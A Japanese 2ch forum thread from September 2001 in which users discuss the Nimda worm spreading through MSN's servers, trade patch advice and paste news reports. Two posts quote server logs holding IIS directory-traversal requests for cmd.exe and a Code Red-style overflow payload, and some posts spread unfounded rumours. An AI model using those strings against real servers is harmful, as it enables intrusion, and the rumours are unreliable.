最悪のウイルス登場MSNが配布 その2
1 :MSN:
前スレ
http://news.2ch.net/test/read.cgi?bbs=news&key=1000769390
警告: このスレに限らずですが、張られたリンクは「対策が済んだMSIE5.5SP2」
もしくは「IE6」で見に行って下さい。
http://news.2ch.net/test/read.cgi?bbs=news&key=1000769390
警告: このスレに限らずですが、張られたリンクは「対策が済んだMSIE5.5SP2」
もしくは「IE6」で見に行って下さい。
|
|
|
2 :2:01/09/19 10:10 ID:.z6DCC0s
2
3 : :01/09/19 10:11 ID:WLemDI/2
>>1へ
お疲れ!! ありがとう!!
お疲れ!! ありがとう!!
4 : :01/09/19 10:11 ID:HVDfRYR.
バージョンは5.5だけどSP1とかSP2とかはどこに載ってるの?
5 : :01/09/19 10:10 ID:EWJVz4Oc
2?
坂東玉三郎カミングアウト!
8 :(゚Д゚)「ゲプーッ!」:01/09/19 10:12 ID:mCICu5N6
>>1 5.5SP2でもI・E6、どっちでもいいんですかい?
9 : :01/09/19 10:12 ID:CIjuhvgQ
10 :Win98:01/09/19 10:12 ID:Ubxngo7E
アップデートのページ、まっちろなんだけど。。。
オイラだけ???
オイラだけ???
11 : :01/09/19 10:12 ID:XgqTfaVQ
早めにアップデートしとかないと
やがて激重になるかな?
やがて激重になるかな?
12 : :01/09/19 10:13 ID:xbjhX50U
前スレチゲーし 藁
はじめて見たよ、前スレちがうの
はじめて見たよ、前スレちがうの
13 :1:01/09/19 10:13 ID:mxUXkeNs
MSIE5.5 SP2 IE6 どっちでも良い
MSIE5.5SP2は確認されているがIE6はおれが踏んで実験したからヨシ。
ちゃんと警告デタヨ。
MSIE5.5SP2は確認されているがIE6はおれが踏んで実験したからヨシ。
ちゃんと警告デタヨ。
14 : :01/09/19 10:13 ID:V2f5utYw
16 : :01/09/19 10:13 ID:0hSV8Kps
ネスケでJavaオフじゃダメなん?
17 :1:01/09/19 10:14 ID:mxUXkeNs
前スレ違う!
自分でもワロタ
自分でもワロタ
18 : :01/09/19 10:15 ID:H1sqALwQ
ウイルス配ってアップデートさせるなんてすごい発想だね。
さすがMS。
さすがMS。
19 : :01/09/19 10:15 ID:qSOu2Upo
>>16
別にダウソロード&実行しなきゃOKよ。
IE5.01、5.5のSP2以前だと、セキュリティーホールつかれて、
自動実行されちゃうからまずいってことらしく。
ついでに、JavaとJavaScriptは別もん。
別にダウソロード&実行しなきゃOKよ。
IE5.01、5.5のSP2以前だと、セキュリティーホールつかれて、
自動実行されちゃうからまずいってことらしく。
ついでに、JavaとJavaScriptは別もん。
20 :名無しさん@お腹いっぱい:01/09/19 10:16 ID:iUSdnviQ
Win95だとIE6は使えないよね?
21 : :01/09/19 10:16 ID:1L5pANOU
IEユーザは
ツール→インターネットオプション→セキュリティ
→レベルのカスタマイズ→JAVAと付くもの全てのラジオを不許可クリック
→ダウンロードのファイルのダウンロードのラジオクリック
→OK→適用→OK
で、まだ感染していなければ防げるはず……だよな?(不安なら書くな俺よ)
ツール→インターネットオプション→セキュリティ
→レベルのカスタマイズ→JAVAと付くもの全てのラジオを不許可クリック
→ダウンロードのファイルのダウンロードのラジオクリック
→OK→適用→OK
で、まだ感染していなければ防げるはず……だよな?(不安なら書くな俺よ)
22 : :01/09/19 10:16 ID:0hSV8Kps
23 : :01/09/19 10:16 ID:I3qXI7NI
インストールされたらどんな被害が出るの?
24 : :01/09/19 10:16 ID:V2f5utYw
前スレ間違えちゃダメだろ(w
25 : :01/09/19 10:17 ID:TH3yhgJE
試しにhttpd立ち上げてしばらく待ってみたんだけど。
これってワームがやってんのかな。
[19/Sep/2001:10:13:55 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 134
[19/Sep/2001:10:13:56 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 134
[19/Sep/2001:10:13:57 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ ../..チ ../..チ ../winnt/system32/cmd.exe HTTP/1.0" 404 134
[19/Sep/2001:10:14:05 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 134
[19/Sep/2001:10:14:09 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 134
[19/Sep/2001:10:14:10 +0900] "GET /scripts/..チ ../winnt/system32/cmd.exe HTTP/1.0" 404 134
[19/Sep/2001:10:14:14 +0900] "GET /sc?/c+dir HTTP/1.0" 404 134
[19/Sep/2001:10:14:20 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 134
[19/Sep/2001:10:14:27 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 134
[19/Sep/2001:10:14:30 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 109
[19/Sep/2001:10:14:39 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 109
これってワームがやってんのかな。
[19/Sep/2001:10:13:55 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 134
[19/Sep/2001:10:13:56 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 134
[19/Sep/2001:10:13:57 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ ../..チ ../..チ ../winnt/system32/cmd.exe HTTP/1.0" 404 134
[19/Sep/2001:10:14:05 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 134
[19/Sep/2001:10:14:09 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 134
[19/Sep/2001:10:14:10 +0900] "GET /scripts/..チ ../winnt/system32/cmd.exe HTTP/1.0" 404 134
[19/Sep/2001:10:14:14 +0900] "GET /sc?/c+dir HTTP/1.0" 404 134
[19/Sep/2001:10:14:20 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 134
[19/Sep/2001:10:14:27 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 134
[19/Sep/2001:10:14:30 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 109
[19/Sep/2001:10:14:39 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 109
26 : :01/09/19 10:17 ID:qSOu2Upo
27 : :01/09/19 10:18 ID:CN87eRgs
28 : :01/09/19 10:18 ID:CIjuhvgQ
どういう経緯で玉三郎になったのだろう・・・・(w
29 :1:01/09/19 10:18 ID:mxUXkeNs
緊迫感が台無しです。
正直悪かった。正直狙ってない。
正直悪かった。正直狙ってない。
30 :前スレの942:01/09/19 10:18 ID:OO3wQbOI
今回のは、既発のパッチが完璧に当たった、IISサーバにも感染するの?
31 :初心者:01/09/19 10:18 ID:L7DiAsK.
ノートンいれてるんですが、それだけじゃだめですかね
32 :名無しさん:01/09/19 10:20 ID:qM9fx6jM
33 : :01/09/19 10:20 ID:75TmM8/w
■緊急セキュリティ情報■
WEBを見るだけで感染するウイルス(Windows向け)が
昨夜(9/18)からネット上で自己増殖しております。
詳細な情報などは2chの関知するところではありませんが
現在判っている限りではインターネットエクスプローラーSP2に
バージョンをあげる事によって「見ただけで感染」は防げるようです。
Windowsユーザーは各自可及的速やかにWindowsUpdateを行ない
その後もWEBから不審なプログラムをダウンロードしない事を強くお勧めいたします。
WEBを見るだけで感染するウイルス(Windows向け)が
昨夜(9/18)からネット上で自己増殖しております。
詳細な情報などは2chの関知するところではありませんが
現在判っている限りではインターネットエクスプローラーSP2に
バージョンをあげる事によって「見ただけで感染」は防げるようです。
Windowsユーザーは各自可及的速やかにWindowsUpdateを行ない
その後もWEBから不審なプログラムをダウンロードしない事を強くお勧めいたします。
34 :名無し:01/09/19 10:20 ID:r9Obg67M
>>30
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
のパッチがあたっていれば問題なし。うちのところ(複数箇所にサーバがあるが)も現時点で一切感染していない。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
のパッチがあたっていれば問題なし。うちのところ(複数箇所にサーバがあるが)も現時点で一切感染していない。
36 : :01/09/19 10:20 ID:ruuRkgsY
http://help.msn.co.jp/notice.htm より
平素より MSN をご利用いただき、まことにありがとうございます。
9 月 18 日夜 11 時ころ、MSN のサーバーが新種のワームによる被害をこうむりました。
また、これにともない、昨晩同時刻以降 MSN のサーバーをご覧になったお客様のコンピュータに、
このワームによる被害がもたらされた可能性があります。 MSN では事態の緊急性に鑑み、
問題が明らかになった後ただちにサーバーをインターネットから遮断する処置をとりましたが、
それ以前の時間帯に MSN をご覧になったお客様につきましては、下記の症状が現れたものと
思われます。
ページを表示する段階で、ある種のファイルをダウンロードするように
求められる。 ページを表示する段階で、ある種のファイルを自動的にダウンロードして実行し
、結果としてハードディスク内に大量のファイルを生成する。
いずれの症状が出たかは、お客様がお使いのブラウザのバージョンによって異なります。
また、1.のケースでファイルをダウンロードして実行した場合、結果として2.と同じ
症状がご利用のコンピュータに発生します。またこれ以外の症状が現れた可能性もありますが、
現時点では確実な情報ではありません。
以下のバージョンのブラウザをご利用の方は、2.の症状が現れた可能性があります。
Internet Explorer 5.01 または Internet Explorer 5.01 SP1
Internet Explorer 5.5 または Internet Explorer 5.5 SP1
それ以外のブラウザをご利用の方は1.の症状が現れたか、または影響
を受けていません。
平素より MSN をご利用いただき、まことにありがとうございます。
9 月 18 日夜 11 時ころ、MSN のサーバーが新種のワームによる被害をこうむりました。
また、これにともない、昨晩同時刻以降 MSN のサーバーをご覧になったお客様のコンピュータに、
このワームによる被害がもたらされた可能性があります。 MSN では事態の緊急性に鑑み、
問題が明らかになった後ただちにサーバーをインターネットから遮断する処置をとりましたが、
それ以前の時間帯に MSN をご覧になったお客様につきましては、下記の症状が現れたものと
思われます。
ページを表示する段階で、ある種のファイルをダウンロードするように
求められる。 ページを表示する段階で、ある種のファイルを自動的にダウンロードして実行し
、結果としてハードディスク内に大量のファイルを生成する。
いずれの症状が出たかは、お客様がお使いのブラウザのバージョンによって異なります。
また、1.のケースでファイルをダウンロードして実行した場合、結果として2.と同じ
症状がご利用のコンピュータに発生します。またこれ以外の症状が現れた可能性もありますが、
現時点では確実な情報ではありません。
以下のバージョンのブラウザをご利用の方は、2.の症状が現れた可能性があります。
Internet Explorer 5.01 または Internet Explorer 5.01 SP1
Internet Explorer 5.5 または Internet Explorer 5.5 SP1
それ以外のブラウザをご利用の方は1.の症状が現れたか、または影響
を受けていません。
37 : :01/09/19 10:21 ID:usJFfbdQ
sp2、DLできんぞ!
アクセス集中しまくってんのか?
MS氏ね!!!!!!!!!!!!!
アクセス集中しまくってんのか?
MS氏ね!!!!!!!!!!!!!
38 : :01/09/19 10:21 ID:1L5pANOU
>>23
ワームが分身を増やそうとWEBコンテンツを見る度にウイルスパケットを
サーバにぶち込む。
バックドアがクライアントを筒抜けにする。
訳わからんファイルが量産され、HDD容量とメモリを食いつぶす。
他あったらフォローよろ
ワームが分身を増やそうとWEBコンテンツを見る度にウイルスパケットを
サーバにぶち込む。
バックドアがクライアントを筒抜けにする。
訳わからんファイルが量産され、HDD容量とメモリを食いつぶす。
他あったらフォローよろ
39 :MSN:01/09/19 10:21 ID:FFteR93Y
MSNが自分のところに修正パッチを当ててなかったってことか?
なんじゃそりゃ
なんじゃそりゃ
40 : :01/09/19 10:21 ID:BCdauIbY
米軍がやっとんとちゃうか?
41 : :01/09/19 10:21 ID:usJFfbdQ
こわくて2ch以外のサイトいけないぞ!!
42 :1:01/09/19 10:22 ID:mxUXkeNs
罪滅ぼし:
サーバー側のワームは現在の所サービスパック及びパッチを当てても
感染するという情報も有り、まだ確認は取れず。
クライアント側はMSIE5.5SP2 MSIE6でダウンロードウインドウが
出るようになる。
それ以前のMSIEはMSNいわく影響はないらしいが2chでは5.00でも感染したという報告。
サーバー側のワームは現在の所サービスパック及びパッチを当てても
感染するという情報も有り、まだ確認は取れず。
クライアント側はMSIE5.5SP2 MSIE6でダウンロードウインドウが
出るようになる。
それ以前のMSIEはMSNいわく影響はないらしいが2chでは5.00でも感染したという報告。
43 :すでに:01/09/19 10:22 ID:wVtcNB2E
WindowsUpdate激重。
IE5.5SP2の標準ダウンロードで3〜4時間以上はかかりそうです。
IE5.5SP2の標準ダウンロードで3〜4時間以上はかかりそうです。
44 : :01/09/19 10:22 ID:vgeUQdF2
MSNの自作自演に1票。
45 :読め!:01/09/19 10:22 ID:4o/feuXU
46 :名無しさん:01/09/19 10:23 ID:qM9fx6jM
Unicode Derectory Traversal?しっかりしろよzdnet
47 :ナナシサン:01/09/19 10:23 ID:ETHVTTR2
サイバーテロリストの犯行だ!
核攻撃を食らわせろ!!!
核攻撃を食らわせろ!!!
48 : :01/09/19 10:24 ID:BCdauIbY
戦争のために通信規制しているんだろ。
米国の自作自演だろ。
米国の自作自演だろ。
49 : :01/09/19 10:24 ID:1vjJkxgU
ドーナツR使ってて、JAVAその他切ってたら、関係ないの?
50 : :01/09/19 10:24 ID:qSOu2Upo
51 :仕様書無しさん:01/09/19 10:24 ID:iaQQZmng
52 :ホントの前スレ:01/09/19 10:25 ID:u5rP1leA
53 :1:01/09/19 10:25 ID:mxUXkeNs
MSIE5.5 SP2 ダメなら
MSIE6 はダウソ出来ない?
http://download.microsoft.com/download/IE60/fnlrtw/ie6/W98NT42KMe/JA/ie6setup.exe
MSIE6 はダウソ出来ない?
http://download.microsoft.com/download/IE60/fnlrtw/ie6/W98NT42KMe/JA/ie6setup.exe
54 :マァヴ ★:01/09/19 10:25 ID:???
55 : :01/09/19 10:25 ID:BCdauIbY
56 : :01/09/19 10:26 ID:HVDfRYR.
MS最低だんだ(´ー`)
マウント富士のサイトでload.exeをゲットしたよ。
今。同居中。
今。同居中。
アップデートすれば問題無いんでしょうか・・・???
59 :マァヴ ★:01/09/19 10:26 ID:???
文字化けするし(^_^;)
60 : :01/09/19 10:26 ID:X4AWx6uY
正しい前スレ:MSNにウィルス添付?
1 名前:うぃるす? 01/09/18 23:19 ID:eDmIjNNM
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
1 名前:うぃるす? 01/09/18 23:19 ID:eDmIjNNM
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50
61 : :01/09/19 10:26 ID:qSOu2Upo
62 :25:01/09/19 10:27 ID:TH3yhgJE
>>32
そうなんだ。うちADSLなんだけどああいうアタックが1時間で50位来る。何故だ。
こんなのも来た。
[19/Sep/2001:10:04:04 +0900] "GET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a HTTP/1.0" 404 134
そうなんだ。うちADSLなんだけどああいうアタックが1時間で50位来る。何故だ。
こんなのも来た。
[19/Sep/2001:10:04:04 +0900] "GET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a HTTP/1.0" 404 134
63 :名無しさん:01/09/19 10:26 ID:qM9fx6jM
64 :名無し:01/09/19 10:26 ID:r9Obg67M
マイクロャtト社には藁た。
65 : :01/09/19 10:27 ID:CIjuhvgQ
そうか、アクセス集中で落とせないのか・・・・(;´Д`)
66 :名無しさん:01/09/19 10:27 ID:xd.89Pkw
Microsoftの積極的な協力のおかげで、Symantecはウハウハですな(´ー`)y−〜〜
68 : :01/09/19 10:27 ID:BceX/Byw
マイコンピュータ内でreadme.exe MEP51B3.TMP.EXE .eml検索して
出てこなかったら大丈夫なんだよね?
出てこなかったら大丈夫なんだよね?
70 :読め:01/09/19 10:29 ID:4o/feuXU
■新種ウイルス「Nimda」の感染拡大=米司法長官■
http://headlines.yahoo.co.jp/hl?a=20010919-00000116-jij-bus_all
【シリコンバレー18日時事】「Nimda(ニムダ)」と呼ばれる
危険度の高い新種のコンピューターウイルスが登場し、ウイルス対策会社
などが注意を呼び掛けている。
米国では同時テロが発生した直後だけに、インターネットを利用した
サイバーテロの活発化が懸念されていたが、アシュクロフト司法長官は
18日「現時点で(ウイルスと)テロとの関連を示す証拠はない」としている。
米ウイルス対策大手シマンテックによると、同ウイルスは、電子メールで
届けられる添付ファイル「readme.exe」に潜み、これを利用者が
不用意に開くことで感染する。
感染したコンピューターは、ウイルスメールを外部に発信。
マイクロソフト製ウェブサーバーソフトを利用している他のコンピューター
に対して同ソフトのセキュリティーホール(欠陥)を狙った攻撃を仕掛ける。
(時事通信)[9月19日9時3分更新]
http://headlines.yahoo.co.jp/hl?a=20010919-00000116-jij-bus_all
【シリコンバレー18日時事】「Nimda(ニムダ)」と呼ばれる
危険度の高い新種のコンピューターウイルスが登場し、ウイルス対策会社
などが注意を呼び掛けている。
米国では同時テロが発生した直後だけに、インターネットを利用した
サイバーテロの活発化が懸念されていたが、アシュクロフト司法長官は
18日「現時点で(ウイルスと)テロとの関連を示す証拠はない」としている。
米ウイルス対策大手シマンテックによると、同ウイルスは、電子メールで
届けられる添付ファイル「readme.exe」に潜み、これを利用者が
不用意に開くことで感染する。
感染したコンピューターは、ウイルスメールを外部に発信。
マイクロソフト製ウェブサーバーソフトを利用している他のコンピューター
に対して同ソフトのセキュリティーホール(欠陥)を狙った攻撃を仕掛ける。
(時事通信)[9月19日9時3分更新]
72 :名無し:01/09/19 10:30 ID:r9Obg67M
The firewall has blocked Internet access to your computer (TCP Port 111) from 211.17.238.51 (TCP Port 4415) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 111) from 202.64.58.100 (TCP Port 4691) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 111) from 202.8.231.244 (TCP Port 1604) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 6635) from 62.23.105.1 (TCP Port 6635) [TCP Flags: SF].
何これ?アタック来たよ
The firewall has blocked Internet access to your computer (TCP Port 111) from 202.64.58.100 (TCP Port 4691) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 111) from 202.8.231.244 (TCP Port 1604) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 6635) from 62.23.105.1 (TCP Port 6635) [TCP Flags: SF].
何これ?アタック来たよ
73 : :01/09/19 10:31 ID:qSOu2Upo
マイクロソフトの体張った啓蒙活動、かな・・・
かなりいい迷惑だけど。
つーか、PC初心者が多く見てるであろうmsnのサーバがまっさきに感染したのがイタい。
かなりいい迷惑だけど。
つーか、PC初心者が多く見てるであろうmsnのサーバがまっさきに感染したのがイタい。
74 : :01/09/19 10:31 ID:BceX/Byw
で、感染したとして、ファイルが共有になってたり、メールを大量送付してた場合、
自分でわかるの?
自分でわかるの?
75 : :01/09/19 10:31 ID:T.hgQQdI
NetScapeでヨカッタ
かちゅ〜しゃもエンジンはIEなので普段IE使わない俺も
アップデートする必要があるのか?
かちゅ〜しゃもエンジンはIEなので普段IE使わない俺も
アップデートする必要があるのか?
76 :名無し:01/09/19 10:32 ID:r9Obg67M
The firewall has blocked Internet access to your computer (TCP Port 8000) from news.2ch.net (216.218.213.162) (TCP Port 4111) [TCP Flags: S]
The firewall has blocked Internet access to your computer (TCP Port 81) from news.2ch.net (216.218.213.162) (TCP Port 4126) [TCP Flags: S].
2ちゃんからアタック来た。
The firewall has blocked Internet access to your computer (TCP Port 81) from news.2ch.net (216.218.213.162) (TCP Port 4126) [TCP Flags: S].
2ちゃんからアタック来た。
77 :49:01/09/19 10:33 ID:1vjJkxgU
>61、>63
ありがとうございます。
ありがとうございます。
>>73
しかもIEデフォルトの設定だとmsnがホームページに設定されてるからなぁ・・
>>72
それはsunrpcのセキュリティホールをつつくUNIX用のワーム。
あっちはあっちでちゃんとセキュリティ対策してないと引っかかるよ。
IISだとsunrpc自体機能が存在しないので引っかからない。
しかもIEデフォルトの設定だとmsnがホームページに設定されてるからなぁ・・
>>72
それはsunrpcのセキュリティホールをつつくUNIX用のワーム。
あっちはあっちでちゃんとセキュリティ対策してないと引っかかるよ。
IISだとsunrpc自体機能が存在しないので引っかからない。
79 : :01/09/19 10:33 ID:0hSV8Kps
80 : :01/09/19 10:33 ID:WBf583Ys
http://headlines.yahoo.co.jp/hl?a=20010919-00000001-vgb-sci
複合的な攻撃、感染機能をもつウィルス Nimda
昨日、22時ごろから国内のwebサーバへの攻撃、新種ウィルスの増殖が急激にひろがった。
これらの一連の被害は、Nimda と呼ばれるウィルスのしわざによるものと思われる。
Nimda は、感染すると、インターネット上のサーバに対して、攻撃を行う。攻撃は既知の
複数セキュリティホールをターゲットとして行われる。サーバへの攻撃に成功すると、
サーバ上のwebページを改竄し、受動的攻撃を行うスクリプトを埋め込む。
このスクリプトを埋め込まれたページを利用者が表示すると、適切な防御措置
(パッチをあててある、スクリプトの実行機能をオフにしているなど)「見ただけで」
感染してしまう。感染した利用者のパソコンは、さらにサーバへの攻撃を行うとともに、
ウィルスを添付した大量のメールを配信する。
こうした一連の複合的な攻撃手法をもった凶悪なウィルスの登場により、
web改竄などの被害が急激に拡大している。
なお、ワームに関しては、certですでに部分的な情報が掲載されている他、
アンチウィルス数社に情報が掲載されている。
[ヤフーニュース9月19日9時59分]
複合的な攻撃、感染機能をもつウィルス Nimda
昨日、22時ごろから国内のwebサーバへの攻撃、新種ウィルスの増殖が急激にひろがった。
これらの一連の被害は、Nimda と呼ばれるウィルスのしわざによるものと思われる。
Nimda は、感染すると、インターネット上のサーバに対して、攻撃を行う。攻撃は既知の
複数セキュリティホールをターゲットとして行われる。サーバへの攻撃に成功すると、
サーバ上のwebページを改竄し、受動的攻撃を行うスクリプトを埋め込む。
このスクリプトを埋め込まれたページを利用者が表示すると、適切な防御措置
(パッチをあててある、スクリプトの実行機能をオフにしているなど)「見ただけで」
感染してしまう。感染した利用者のパソコンは、さらにサーバへの攻撃を行うとともに、
ウィルスを添付した大量のメールを配信する。
こうした一連の複合的な攻撃手法をもった凶悪なウィルスの登場により、
web改竄などの被害が急激に拡大している。
なお、ワームに関しては、certですでに部分的な情報が掲載されている他、
アンチウィルス数社に情報が掲載されている。
[ヤフーニュース9月19日9時59分]
81 : :01/09/19 10:35 ID:cd9RQlRQ
今回はシマンテックの勝利。トレンドマイクロ出遅れたな
Windows2000SP2に同梱されてるIE5.01SP2使ってるんだけどコレは大丈夫?
それとも逝ってよしですか?
それとも逝ってよしですか?
84 : :01/09/19 10:36 ID:cUwoT4o6
IE5.5sp2がおとせん
あと2時間かかる・・
あと2時間かかる・・
85 :名無し:01/09/19 10:35 ID:r9Obg67M
The firewall has blocked Internet access to your computer (TCP Port 8000) from ton.2ch.net (64.71.133.114) (TCP Port 3893) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 81) from ton.2ch.net (64.71.133.114) (TCP Port 3894) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 8081) from ton.2ch.net (64.71.133.114) (TCP Port 3895) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 9081) from ton.2ch.net (64.71.133.114) (TCP Port 3896) [TCP Flags: S].
もう最悪。ゾヌが警告で2ちゃんから30件のアタック
The firewall has blocked Internet access to your computer (TCP Port 81) from ton.2ch.net (64.71.133.114) (TCP Port 3894) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 8081) from ton.2ch.net (64.71.133.114) (TCP Port 3895) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 9081) from ton.2ch.net (64.71.133.114) (TCP Port 3896) [TCP Flags: S].
もう最悪。ゾヌが警告で2ちゃんから30件のアタック
86 :72?:01/09/19 10:36 ID:OtlH8lsE
ラディンの仕業ですか?
マイクロソフト=アメリカってこと?
マイクロソフト=アメリカってこと?
87 :nanasisan:01/09/19 10:36 ID:KSWVQD0E
88 : :01/09/19 10:37 ID:CN87eRgs
正直、msnって行ったことないんだけどそんなに便利なの?
89 : :01/09/19 10:37 ID:BceX/Byw
90 : :01/09/19 10:37 ID:qSOu2Upo
91 : :01/09/19 10:38 ID:cd9RQlRQ
2chのサーバもやられちゃったの?
92 : :01/09/19 10:39 ID:uy8Pfu/w
W32.Nimda.A@mmのする行動で現時点で判明していること
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000318.htm
>つまり、こういう流れです。
>
> サーバーに感染
> ↓
> ページを書き換える
> ↓
> 書き換えられたページを見た人が感染
> ↓
> OutlookやOutlookExpressのMAPIを利用してワームつきウイルスを送信
> ↓
> 誰かにまた感染
>
> これを延々と繰り返します。
ホント?
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000318.htm
>つまり、こういう流れです。
>
> サーバーに感染
> ↓
> ページを書き換える
> ↓
> 書き換えられたページを見た人が感染
> ↓
> OutlookやOutlookExpressのMAPIを利用してワームつきウイルスを送信
> ↓
> 誰かにまた感染
>
> これを延々と繰り返します。
ホント?
93 : :01/09/19 10:39 ID:HVDfRYR.
94 :87?:01/09/19 10:39 ID:OtlH8lsE
オレ、アナログなので、大変っす!
普段はテレホタイムにしかやらないんだけど、
今日は風邪で休んだから、
この時間にネットをしていたら、
なんかウィルスらしいじゃないっすか!
ふぅ…。
ラディンに違いない!ムカツク!
普段はテレホタイムにしかやらないんだけど、
今日は風邪で休んだから、
この時間にネットをしていたら、
なんかウィルスらしいじゃないっすか!
ふぅ…。
ラディンに違いない!ムカツク!
95 :ナナシサン:01/09/19 10:39 ID:ETHVTTR2
>715
別にベストエフォートじゃなくてもいいからさ
512kbpsとか1Mbpsにしてくれねぇかな
それぐらいしてくれても罰は当たらんと思うがね
別にベストエフォートじゃなくてもいいからさ
512kbpsとか1Mbpsにしてくれねぇかな
それぐらいしてくれても罰は当たらんと思うがね
96 :95?:01/09/19 10:40 ID:OtlH8lsE
IE6日本語版っていつになったら出るの?
97 : :01/09/19 10:40 ID:CIjuhvgQ
俺もmsnなんて、ほとんど使った事は無い。
たまにアドレスバーから直に検索するぐらいだ。
たまにアドレスバーから直に検索するぐらいだ。
98 :最悪。。。:01/09/19 10:40 ID:wVtcNB2E
Internet Explorer およびインターネット ツールのインストール中にほかのダウンロード サイトへの接続を試みましたが、ネットワークの問題のため接続できませんでした。早朝、深夜など、比較的空いている時間にもう一度セットアップ プログラムを実行してみてください。
また、インターネット サービス プロバイダ側に問題がある可能性もあります。
再びインターネットに接続できたら、[はい、セットアップを再開します] をクリックして、前回のセットアップの続きを実行してください。
また、インターネット サービス プロバイダ側に問題がある可能性もあります。
再びインターネットに接続できたら、[はい、セットアップを再開します] をクリックして、前回のセットアップの続きを実行してください。
99 : :01/09/19 10:40 ID:1L5pANOU
ウイルス対応の速さを謳っていたMcAFEEは全く反応してないなぁ。
ウイルス名検索すらHITしないわ(藁
ウイルス名検索すらHITしないわ(藁
100 : :01/09/19 10:41 ID:cd9RQlRQ
101 : :01/09/19 10:41 ID:rUiXeQag
大変だ!IEのパッチにもウイルスが!
アップデートするな!
NESCAPEつかえ!
アップデートするな!
NESCAPEつかえ!
102 : :01/09/19 10:41 ID:qM9fx6jM
http://help.msn.co.jp/notice.htmより引用。
>また、昨晩の時点ですでに影響を受けていると思われるケースについては、
>該当するコンピュータをインターネットの環境から切り離し、
>追って提供されると思われる各ウィルス対策ソフトの最新ウィルス定義ファイルを入手後、
>コンピュータ内をスキャンして問題のあるファイルを駆除することをお勧めします。
インターネットに接続しちゃいけないのに
ウィルス定義ファイルを入手しなければいけないらしい。
これは難題だ。
>また、昨晩の時点ですでに影響を受けていると思われるケースについては、
>該当するコンピュータをインターネットの環境から切り離し、
>追って提供されると思われる各ウィルス対策ソフトの最新ウィルス定義ファイルを入手後、
>コンピュータ内をスキャンして問題のあるファイルを駆除することをお勧めします。
インターネットに接続しちゃいけないのに
ウィルス定義ファイルを入手しなければいけないらしい。
これは難題だ。
103 : :01/09/19 10:42 ID:2CYBgGgA
ウインドウズアップデートに逝ったら、
アクティブXを許可するようセキュリティレベルを変更しろという
